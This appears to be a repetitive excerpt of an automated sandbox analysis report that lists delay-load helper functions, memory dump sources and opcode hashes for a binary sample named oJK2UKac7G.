    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 15c10979cc5454f736ef43564f87e281a4850f3b5c57fac609d346a265b9fa51
    • Instruction ID: 5abb2995a835ac60a89a1b1b3fb1b5a841aec171afa2228dfef166ad655ce1e1
    • Opcode Fuzzy Hash: 15c10979cc5454f736ef43564f87e281a4850f3b5c57fac609d346a265b9fa51
    • Instruction Fuzzy Hash: C0B012C127A1037C3B8461A9BC02F3B022CC0D5B19370813FF202C1080F4501C023472
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: bc2efbc3202609809abce83e926c27db65599b265a849460dfe6c37f2d64d26e
    • Instruction ID: 52832efd2ada895f78a2123b2ba9187e6f0ee1a7a8fea79040465c563b7b4819
    • Opcode Fuzzy Hash: bc2efbc3202609809abce83e926c27db65599b265a849460dfe6c37f2d64d26e
    • Instruction Fuzzy Hash: 82B012C527A2037C3FC461A56C02F3B026CC0D5B19330813FF202C10C0F4501C427072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0d1b257cccc647f26a5ccb39505e514ae00d8f09ca288d69f08461955f94cab5
    • Instruction ID: aa22df1f5faaefc65745e8510601bffbca94fdf054f3cee8be85a7c45194c001
    • Opcode Fuzzy Hash: 0d1b257cccc647f26a5ccb39505e514ae00d8f09ca288d69f08461955f94cab5
    • Instruction Fuzzy Hash: 1AB012C527A1077C3B8461A56C02F3B022CC0D5B19370803FF202C10C0F4501C023172
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 204f7cfa7da74724115879fc003363f572fa9a12b82a03a660c35dc69097fe17
    • Instruction ID: 69e0ce8934286e92d8d4e5bd3b890c04ef30a8d1bb2b3856aa742a03f673f04c
    • Opcode Fuzzy Hash: 204f7cfa7da74724115879fc003363f572fa9a12b82a03a660c35dc69097fe17
    • Instruction Fuzzy Hash: C8B012C127A1037C3BC461A56C02F3B021CC0D5B19330C13FF202C1180F4601C463072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7f5ecc9272277476614e30dcee6cf9a7021bf199f0316b3dd663cd9e166f0e56
    • Instruction ID: 6443f2803397d252c129f42a0787a3aaba4d618c6487ee8bb016bcd7701e4ccb
    • Opcode Fuzzy Hash: 7f5ecc9272277476614e30dcee6cf9a7021bf199f0316b3dd663cd9e166f0e56
    • Instruction Fuzzy Hash: 56B012C227A0037C3B8461A56C02F3F021CC0D6B1D330C03FF602C1180F4601C063072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6ff57859162497a22b1877e75f98822f514b168d425d28158e9d659d295070ba
    • Instruction ID: 5cf3babc541e64faaabeea910a45ff9b77a2a6219c9b755bb17f693a9c1a49c9
    • Opcode Fuzzy Hash: 6ff57859162497a22b1877e75f98822f514b168d425d28158e9d659d295070ba
    • Instruction Fuzzy Hash: 41B012C127A0077D3B4421A16C06E3B021CC0D5B1A370803FF202C00C0F4601C023072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e2b1882ef4208ce1758d5a379733d1e589e0e8f24c1d7bcbf81f610a92f51160
    • Instruction ID: feff9112ff3483f1eba4b6498d720655a0fbc3d86bcd2c08188569ab3cc7aab4
    • Opcode Fuzzy Hash: e2b1882ef4208ce1758d5a379733d1e589e0e8f24c1d7bcbf81f610a92f51160
    • Instruction Fuzzy Hash: 02B012C127A4037C3B8461A9BD02F3B022CC0D5B19370823FF202C5080F4901D033072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1ff6f6d394afe73d0cd56b7834aa4494e204f3e7b8d621971a6961247220f38d
    • Instruction ID: a59e0ab633ff7b6f16f0087732efd3d651bae6fe09b07237e8618fd396ac35c9
    • Opcode Fuzzy Hash: 1ff6f6d394afe73d0cd56b7834aa4494e204f3e7b8d621971a6961247220f38d
    • Instruction Fuzzy Hash: 93B012C227A0077D3B8461A56C02F3B026CC0D5B19370813FF202C1080F4501C023072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 69d98696406004d938bc88e3106157482f46bb3c9883c8242ebd807fc9d39eb8
    • Instruction ID: d97ee2d7b1664d270081b8c6cec56a7e07d8261f1d7e23151fbd37486b246042
    • Opcode Fuzzy Hash: 69d98696406004d938bc88e3106157482f46bb3c9883c8242ebd807fc9d39eb8
    • Instruction Fuzzy Hash: CFB012C127A1037C3BC461A56C03F3B021CC0D5B19331C13FF202C1080F4501C4230B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a74bd8e7bb50350b3afba577d626fc70512240fee0879111e2ef442b5ea80cba
    • Instruction ID: 655808a640bb3641fee440fee934dfe655becde1096ad342b46b0e7457034f28
    • Opcode Fuzzy Hash: a74bd8e7bb50350b3afba577d626fc70512240fee0879111e2ef442b5ea80cba
    • Instruction Fuzzy Hash: 02B0928127A0026C3A8461A56802E3A021CC096B19330803FF602C1080E45018022072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ec2fb115d7c404f48a21dea8f1cb718f17c086bcdbc6a6b712910652652f057b
    • Instruction ID: eb61036881ab56127896baa4731ccd724dadb4835a4945a880f4e598e046c694
    • Opcode Fuzzy Hash: ec2fb115d7c404f48a21dea8f1cb718f17c086bcdbc6a6b712910652652f057b
    • Instruction Fuzzy Hash: 03B012C12B80067E324461AABC22F37054CC0C9B15331433FF202C1080E8904C0720B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 20184cd44af387286dd6bbdc3893b28331a1d9a70a0c0cdbb27ec1b26a3ccd6a
    • Instruction ID: 4229fb1af82512c294cce425607fdc66091e8bc88bf630a6830fd7eb12a399b4
    • Opcode Fuzzy Hash: 20184cd44af387286dd6bbdc3893b28331a1d9a70a0c0cdbb27ec1b26a3ccd6a
    • Instruction Fuzzy Hash: 54B012C12E810A7E324461AA7C22F37015CC0C9B15331413FF202C10C0E8904C0721B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: cc7e594a858cd2bec63b9c9bb872454796593f4835aedca558241c65e619087c
    • Instruction ID: a4fc85b0f3b234e99bf0256f09d61f8e61bc91a31064d06423af214cdceab860
    • Opcode Fuzzy Hash: cc7e594a858cd2bec63b9c9bb872454796593f4835aedca558241c65e619087c
    • Instruction Fuzzy Hash: 84B012C12A82067E374461AA7C12E37019CC4C9B15332423FF202C10C0E8904C4B20B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2d7dff1bf671e3f06925ff58c4acb6c940fea25e0eb812d83cd3984544e59c14
    • Instruction ID: 58e5415fee7a82686ea1446b9984cee8c32411deac8115fc5c39b98720719f65
    • Opcode Fuzzy Hash: 2d7dff1bf671e3f06925ff58c4acb6c940fea25e0eb812d83cd3984544e59c14
    • Instruction Fuzzy Hash: 10B012C92785037C330821E1FD03D37010CC8C5B19330803FF302D44C1A8600C0320B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0e18510d7d02dd5f3e43dfa234a5d613704bd0908403e8d023f0a2f6a1d7d32d
    • Instruction ID: 57503eeba65c94a5a023a1c5c5a2b597e7d48fff5fb3e604697ac20e7e17965e
    • Opcode Fuzzy Hash: 0e18510d7d02dd5f3e43dfa234a5d613704bd0908403e8d023f0a2f6a1d7d32d
    • Instruction Fuzzy Hash: BEB012D12784037C324461F56D03E37010CC0C9B19330803FF302C42C0E8500C0721B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 238328ac252a5a39bc75a4e3ff77234bbe6d9ece91128779d9274edb9679dc23
    • Instruction ID: 287ea57fb84d19b19b2553cdc864b99ce84176ba29cb5bed445bda06baaf6d4c
    • Opcode Fuzzy Hash: 238328ac252a5a39bc75a4e3ff77234bbe6d9ece91128779d9274edb9679dc23
    • Instruction Fuzzy Hash: 13B012D12781037C334461F56C03E37010CC4C9B19330413FF202C03C0E8500C4A21B2
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
